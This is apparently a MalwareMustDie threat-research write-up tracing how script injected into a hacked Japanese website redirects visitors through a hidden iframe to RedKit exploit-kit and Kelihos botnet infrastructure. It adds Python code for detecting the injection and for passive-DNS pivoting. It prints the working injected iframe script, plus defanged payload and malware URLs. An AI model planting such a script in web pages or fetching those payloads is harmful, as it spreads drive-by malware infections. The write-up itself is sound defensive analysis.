- // #MalwareMustDie!
- // Relation between Hacked Sites, RedKit EK and -
- // Kelihos infection - a PoC
- // Infector: a hacked site:
- h00p://midinette.co.jp/
- // Injected script, padded on the live page with long runs of whitespace to push it out of view:
- </table><!--6b1ee4-->
- <script type="text/javascript" language="javascript" >
- (function () { var tu = document.createElement('iframe');
- tu.src = 'h00p://vezylgys.ru/count10.php'; <========================
- tu.style.position = 'absolute';
- tu.style.border = '0';
- tu.style.height = '1px';
- tu.style.width = '1px';
- tu.style.left = '1px';
- tu.style.top = '1px';
- if (!document.getElementById('tu')) {
- document.write('<div id=\'tu\'></div>');
- document.getElementById('tu').appendChild(tu); }})();
- </script><!--/6b1ee4-->
- // The iframe domain is a KELIHOS payload domain:
- "vezylgys.ru"
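- // The injection pattern above (hex-tagged comment pair wrapping a script that builds a 1x1 absolutely-positioned iframe) is easy to scan for. The following is an added example, not code from the original paste or from MalwareMustDie: a small Python scanner that pulls such blocks out of a page and extracts the iframe destination. The sample page is constructed here from the injected script shown above, with the URL kept defanged (h00p://) so nothing resolves; the regexes and function names are my own assumptions about what such a scanner should match.

```python
import re

# Constructed sample page: the injected block seen on the hacked site, kept defanged.
SAMPLE_HTML = """<html><body><table><tr><td>site</td></tr></table><!--6b1ee4-->
<script type="text/javascript" language="javascript" >
(function () { var tu = document.createElement('iframe');
tu.src = 'h00p://vezylgys.ru/count10.php';
tu.style.position = 'absolute';
tu.style.border = '0';
tu.style.height = '1px';
tu.style.width = '1px';
tu.style.left = '1px';
tu.style.top = '1px';
if (!document.getElementById('tu')) {
document.write('<div id=\\'tu\\'></div>');
document.getElementById('tu').appendChild(tu); }})();
</script><!--/6b1ee4-->
</body></html>"""

# Injected blocks are wrapped in a paired hex-tagged comment: <!--6b1ee4--> ... <!--/6b1ee4-->
MARKER_RE = re.compile(r"<!--([0-9a-f]{4,12})-->(.*?)<!--/\1-->", re.S | re.I)
# Script-built iframe whose src is assigned a (possibly defanged) URL
IFRAME_RE = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I)
SRC_RE = re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Styling that makes the frame effectively invisible (0/1 px height or width)
HIDDEN_RE = re.compile(r"style\.(?:height|width)\s*=\s*['\"]\s*[01](?:px)?\s*['\"]", re.I)
# Accepts http(s):// as well as defanged hxxp:// and h00p:// forms
HOST_RE = re.compile(r"^(?:h[0x]{2}ps?|https?)://([^/:]+)", re.I)


def scan_injected_iframes(html):
    """Return one finding per hex-comment-wrapped block that builds a hidden iframe."""
    findings = []
    for m in MARKER_RE.finditer(html):
        tag, body = m.group(1), m.group(2)
        if not IFRAME_RE.search(body):
            continue  # comment pair without an iframe builder: not this pattern
        hidden = bool(HIDDEN_RE.search(body)) and "absolute" in body
        for src in SRC_RE.findall(body):
            host = HOST_RE.match(src)
            findings.append({
                "marker": tag,
                "src": src,
                "host": host.group(1).lower() if host else None,
                "hidden": hidden,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_injected_iframes(SAMPLE_HTML):
        print(finding)
```

- // The comment marker is matched as a pair (open tag equals close tag) so a stray hex comment elsewhere in the page does not produce a hit; the host extracted from the iframe src is what you would feed into the passive-DNS pivot that follows.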
- // Following the infector URL (at the time of writing the domain no longer resolved):
- --2013-11-05 15:22:25-- h00p://vezylgys.ru/count10.php
- Resolving vezylgys.ru (vezylgys.ru)...
- failed: hostname nor servname provided, or not known.
- unable to resolve host address 'vezylgys.ru'
- // IP addresses used, per passive DNS (first-seen date, IP), show fast-flux behaviour:
- 2012-12-01 106.1.203.42
- 2013-04-17 109.251.176.16
- 2013-04-22 178.151.148.83
- 2012-12-01 178.158.182.164
- 2012-12-01 37.229.37.16
- 2012-12-01 46.118.41.236
- 2012-12-01 46.119.245.121
- 2012-12-01 93.79.247.98
- // If we pick one of those addresses, the rest of the Kelihos domains appear:
- 178.151.148.83 IP address information
- 2013-05-18 cylylwib.ru
- 2013-04-29 hg9lditg.ojmeqkuq.ru
- 2013-08-11 nyzveuc.com
- 2013-06-28 peabtaka.ru
- 2013-07-16 tofhermi.ru
- 2013-06-28 utykixep.ru
- 2013-04-22 vezylgys.ru
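- // The pivot just done by hand (domain -> its IPs -> every other domain seen on those IPs) is the standard passive-DNS infrastructure walk. Below is an added example, not part of the original paste and not MalwareMustDie's tooling: a Python breadth-first pivot over a constructed record set built from the resolutions listed above. It goes a step beyond the single hop shown in the write-up by following the walk for a configurable number of hops, and it reports how many distinct IPs a domain has used, which is the number that flags fast flux. Record layout, function names and the hop limit are my assumptions; a real run would pull the records from a passive-DNS source.

```python
from collections import defaultdict

# Constructed passive-DNS records (first-seen date, domain, IP) taken from the
# resolutions listed in this write-up.
PDNS = [
    ("2012-12-01", "vezylgys.ru", "106.1.203.42"),
    ("2013-04-17", "vezylgys.ru", "109.251.176.16"),
    ("2013-04-22", "vezylgys.ru", "178.151.148.83"),
    ("2012-12-01", "vezylgys.ru", "178.158.182.164"),
    ("2012-12-01", "vezylgys.ru", "37.229.37.16"),
    ("2012-12-01", "vezylgys.ru", "46.118.41.236"),
    ("2012-12-01", "vezylgys.ru", "46.119.245.121"),
    ("2012-12-01", "vezylgys.ru", "93.79.247.98"),
    ("2013-05-18", "cylylwib.ru", "178.151.148.83"),
    ("2013-04-29", "hg9lditg.ojmeqkuq.ru", "178.151.148.83"),
    ("2013-08-11", "nyzveuc.com", "178.151.148.83"),
    ("2013-06-28", "peabtaka.ru", "178.151.148.83"),
    ("2013-07-16", "tofhermi.ru", "178.151.148.83"),
    ("2013-06-28", "utykixep.ru", "178.151.148.83"),
]


def build_index(records):
    """Two-way index: domain -> set of IPs, IP -> set of domains."""
    by_domain = defaultdict(set)
    by_ip = defaultdict(set)
    for _date, domain, ip in records:
        by_domain[domain].add(ip)
        by_ip[ip].add(domain)
    return by_domain, by_ip


def pivot(seed, records, max_hops=2):
    """Breadth-first walk seed domain -> IPs -> domains, repeated up to max_hops.

    Returns (related_domains, ips_touched); the seed itself is excluded from the
    domain set. One hop reproduces the manual pivot in the write-up.
    """
    by_domain, by_ip = build_index(records)
    seen_domains = {seed}
    seen_ips = set()
    frontier = {seed}
    for _ in range(max_hops):
        ips = set()
        for d in frontier:
            ips |= by_domain.get(d, set())
        new_ips = ips - seen_ips
        seen_ips |= new_ips
        next_domains = set()
        for ip in new_ips:
            next_domains |= by_ip[ip]
        frontier = next_domains - seen_domains
        seen_domains |= frontier
        if not frontier:
            break  # the walk has converged; nothing new to expand
    return seen_domains - {seed}, seen_ips


def fast_flux_score(domain, records):
    """Distinct IPs a domain has resolved to; a high count over a short window is the flux signal."""
    by_domain, _ = build_index(records)
    return len(by_domain.get(domain, set()))


if __name__ == "__main__":
    related, ips = pivot("vezylgys.ru", PDNS)
    print("related domains:", sorted(related))
    print("ips touched:", sorted(ips))
    print("distinct IPs for vezylgys.ru:", fast_flux_score("vezylgys.ru", PDNS))
```

- // On this record set the walk converges after one hop: the seven other IPs of vezylgys.ru host nothing else here, and 178.151.148.83 is the one address that ties the six sibling domains together. Dates are carried in the records so the same index can be restricted to a time window before pivoting.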
- // Let's check the payload records on that IP (AV detection ratio, date, URL):
- 2/39 2013-08-14 11:07:55 h00p://178.151.148.83/rasta02.exe
- 1/39 2013-07-21 17:16:16 h00p://178.151.148.83/file.htm
- 4/39 2013-07-16 15:53:11 h00p://tofhermi.ru/rasta01.exe
- 1/38 2013-07-14 11:44:41 h00p://178.151.148.83/index.htm
- 1/39 2013-07-14 11:44:41 h00p://178.151.148.83/main.htm
- 1/38 2013-07-12 08:12:36 h00p://178.151.148.83/login.htm
- 5/39 2013-06-28 09:19:56 h00p://utykixep.ru/goodtr1.exe
- 4/39 2013-06-28 09:20:02 h00p://peabtaka.ru/b0ber01.exe
- 2/39 2013-05-17 18:19:56 h00p://178.151.148.83/welcome.htm
- 1/39 2013-05-13 19:12:45 h00p://178.151.148.83/setup.htm
- 3/35 2013-04-29 04:38:11 h00p://hg9lditg.ojmeqkuq.ru/calc.exe
- 5/36 2013-04-22 16:14:05 h00p://vezylgys.ru/
- // All of the URLs above are either Kelihos payloads or RedKit EK URLs.
- // Now we have a PoC relation:
- This infected site, via the count**.php iframe redirection, leads to the same infrastructure as the Kelihos botnet.
- Kelihos spreads itself through hacked sites injected with the infector script,
- which likely forwards victims to the exploit kit that drops the payload.
- ---
- #MalwareMustDie!